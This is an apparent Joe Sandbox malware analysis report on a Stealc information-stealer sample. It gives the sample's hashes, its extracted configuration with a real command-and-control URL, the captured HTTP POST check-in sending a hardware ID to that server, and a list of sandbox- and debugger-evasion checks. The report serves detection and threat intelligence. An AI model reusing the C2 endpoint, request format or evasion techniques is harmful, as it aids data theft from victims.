Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1526104
MD5:5e8286d88eeff93b753e7454a6b431fd
SHA1:9cd9b91b5dd298a811d922714c506581e7c27b96
SHA256:9c62b127d6790b9b7957057a75441bc1a4e5eaf4f5c6c2669e833154739adb00
Tags:exeuser-Bitsight
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 2228 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 5E8286D88EEFF93B753E7454A6B431FD)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2120585250.00000000008BE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000003.2079880306.0000000004C10000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: file.exe PID: 2228JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: file.exe PID: 2228JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.file.exe.d30000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-04T18:56:06.423122+020020442431Malware Command and Control Activity Detected192.168.2.549704185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: file.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.file.exe.d30000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_00D3C820
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D39AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00D39AC0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D37240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00D37240
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D39B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00D39B60
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D48EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00D48EA0
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D438B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_00D438B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D44910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D44910
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_00D3DA80
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_00D3E430
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D44570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00D44570
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_00D3ED20
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D316D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D316D0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3F68A FindFirstFileA,0_2_00D3F68A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D3F6B0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D43EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00D43EA0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_00D3BE70
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D3DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00D3DE10

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDAFBFCFHIDAKFIIEBAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 44 41 46 42 46 43 46 48 49 44 41 4b 46 49 49 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 32 44 45 44 30 38 33 45 39 35 30 33 30 31 32 33 34 33 35 37 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 41 46 42 46 43 46 48 49 44 41 4b 46 49 49 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 41 46 42 46 43 46 48 49 44 41 4b 46 49 49 45 42 41 2d 2d 0d 0a Data Ascii: ------DHDAFBFCFHIDAKFIIEBAContent-Disposition: form-data; name="hwid"22DED083E9503012343576------DHDAFBFCFHIDAKFIIEBAContent-Disposition: form-data; name="build"doma------DHDAFBFCFHIDAKFIIEBA--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D34880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00D34880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DHDAFBFCFHIDAKFIIEBAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 48 44 41 46 42 46 43 46 48 49 44 41 4b 46 49 49 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 32 44 45 44 30 38 33 45 39 35 30 33 30 31 32 33 34 33 35 37 36 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 41 46 42 46 43 46 48 49 44 41 4b 46 49 49 45 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 44 48 44 41 46 42 46 43 46 48 49 44 41 4b 46 49 49 45 42 41 2d 2d 0d 0a Data Ascii: ------DHDAFBFCFHIDAKFIIEBAContent-Disposition: form-data; name="hwid"22DED083E9503012343576------DHDAFBFCFHIDAKFIIEBAContent-Disposition: form-data; name="build"doma------DHDAFBFCFHIDAKFIIEBA--
                Source: file.exe, 00000000.00000002.2120585250.00000000008BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: file.exe, 00000000.00000002.2120585250.0000000000918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: file.exe, 00000000.00000002.2120585250.0000000000902000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/C
                Source: file.exe, 00000000.00000002.2120585250.0000000000918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: file.exe, 00000000.00000002.2120585250.0000000000918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpB
                Source: file.exe, 00000000.00000002.2120585250.0000000000934000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpF
                Source: file.exe, 00000000.00000002.2120585250.0000000000918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpo
                Source: file.exe, 00000000.00000002.2120585250.0000000000918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpr
                Source: file.exe, 00000000.00000002.2120585250.0000000000918000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php~

                System Summary

                barindex
                PE file contains section with special chars
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F41560_2_010F4156
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0110916B0_2_0110916B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010FD9EE0_2_010FD9EE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0105B1E00_2_0105B1E0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0118400A0_2_0118400A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011028410_2_01102841
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F03690_2_010F0369
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010FFB890_2_010FFB89
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010FA3A30_2_010FA3A3
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01105BCC0_2_01105BCC
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0101571F0_2_0101571F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_01107E1D0_2_01107E1D
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010DFE830_2_010DFE83
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00D345C0 appears 316 times
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: file.exeStatic PE information: Section: uygwklsw ZLIB complexity 0.9949165076335877
                Source: file.exe, 00000000.00000002.2120930222.0000000000D31000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2079880306.0000000004C10000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D48680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,0_2_00D48680
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D43720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00D43720
                Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\SXNZZ16P.htmJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: file.exeStatic file information: File size 1833472 > 1048576
                Source: file.exeStatic PE information: Raw size of uygwklsw is bigger than: 0x100000 < 0x199600

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.d30000.0.unpack :EW;.rsrc :W;.idata :W; :EW;uygwklsw:EW;sowhbkpg:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;uygwklsw:EW;sowhbkpg:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D49860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00D49860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: file.exeStatic PE information: real checksum: 0x1c2907 should be: 0x1cb203
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: .rsrc
                Source: file.exeStatic PE information: section name: .idata
                Source: file.exeStatic PE information: section name:
                Source: file.exeStatic PE information: section name: uygwklsw
                Source: file.exeStatic PE information: section name: sowhbkpg
                Source: file.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0119C911 push 70CE36DEh; mov dword ptr [esp], eax0_2_0119C934
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011CA104 push 2BE62F23h; mov dword ptr [esp], eax0_2_011CA110
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_011B4105 push 282133F6h; mov dword ptr [esp], eax0_2_011B41C2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE40DD push ecx; mov dword ptr [esp], edi0_2_00FE40F1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE40DD push 617CF6B3h; mov dword ptr [esp], ecx0_2_00FE4197
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE40DD push 036D77C9h; mov dword ptr [esp], esi0_2_00FE4245
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE40DD push ebp; mov dword ptr [esp], edi0_2_00FE4270
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00FE40DD push eax; mov dword ptr [esp], 62EAE6C1h0_2_00FE4274
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0118892E push ecx; mov dword ptr [esp], edx0_2_011889A5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F4156 push eax; mov dword ptr [esp], esi0_2_010F420B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F4156 push 6A10B396h; mov dword ptr [esp], eax0_2_010F4213
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F4156 push 3480CEFDh; mov dword ptr [esp], edx0_2_010F42A6
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F4156 push eax; mov dword ptr [esp], edi0_2_010F43D4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F4156 push eax; mov dword ptr [esp], ebp0_2_010F4404
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F4156 push ecx; mov dword ptr [esp], 0681DBFAh0_2_010F4535
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F4156 push 60DA73E7h; mov dword ptr [esp], esi0_2_010F4572
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F4156 push 5D28279Ah; mov dword ptr [esp], edx0_2_010F45BE
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F4156 push 777B1058h; mov dword ptr [esp], ecx0_2_010F46B5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F4156 push ebx; mov dword ptr [esp], edx0_2_010F475B
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F4156 push 786BCF45h; mov dword ptr [esp], ecx0_2_010F47D2
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F4156 push 5D51634Dh; mov dword ptr [esp], ecx0_2_010F47DF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F4156 push 2C5CF9E2h; mov dword ptr [esp], eax0_2_010F47EF
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F4156 push 1C1DCC99h; mov dword ptr [esp], ebx0_2_010F4801
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F4156 push eax; mov dword ptr [esp], edi0_2_010F485A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F4156 push esi; mov dword ptr [esp], ebx0_2_010F485F
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F4156 push ebx; mov dword ptr [esp], esi0_2_010F4884
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F4156 push 6A392154h; mov dword ptr [esp], edx0_2_010F4894
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F4156 push 62AED822h; mov dword ptr [esp], eax0_2_010F4967
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F4156 push 584B5B43h; mov dword ptr [esp], esp0_2_010F499C
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F4156 push ebp; mov dword ptr [esp], edx0_2_010F4A29
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_010F4156 push 5C5F3346h; mov dword ptr [esp], esi0_2_010F4A39
                Source: file.exeStatic PE information: section name: uygwklsw entropy: 7.954033280427647

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: RegmonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\file.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00D49860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00D49860

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking locale)
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetUserDefaultLangID, ExitProcessgraph_0-13404
                Tries to detect sandboxes / dynamic malware analysis system (registry check)
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
                Source: C:\Users\user\Desktop\file.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110EBD6 second address: 110EBDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10F83A3 second address: 10F83A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110DB53 second address: 110DB7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnc 00007FC83CB776A6h 0x0000000c jng 00007FC83CB776A6h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FC83CB776B2h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110DB7E second address: 110DBA4 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC83CB64D36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f pushad 0x00000010 popad 0x00000011 jl 00007FC83CB64D36h 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a jns 00007FC83CB64D36h 0x00000020 jne 00007FC83CB64D36h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110DE40 second address: 110DE56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FC83CB776B0h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110DF81 second address: 110DFA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC83CB64D3Fh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnl 00007FC83CB64D36h 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110E12C second address: 110E150 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC83CB776B4h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 110E150 second address: 110E165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC83CB64D41h 0x00000009 rdtsc
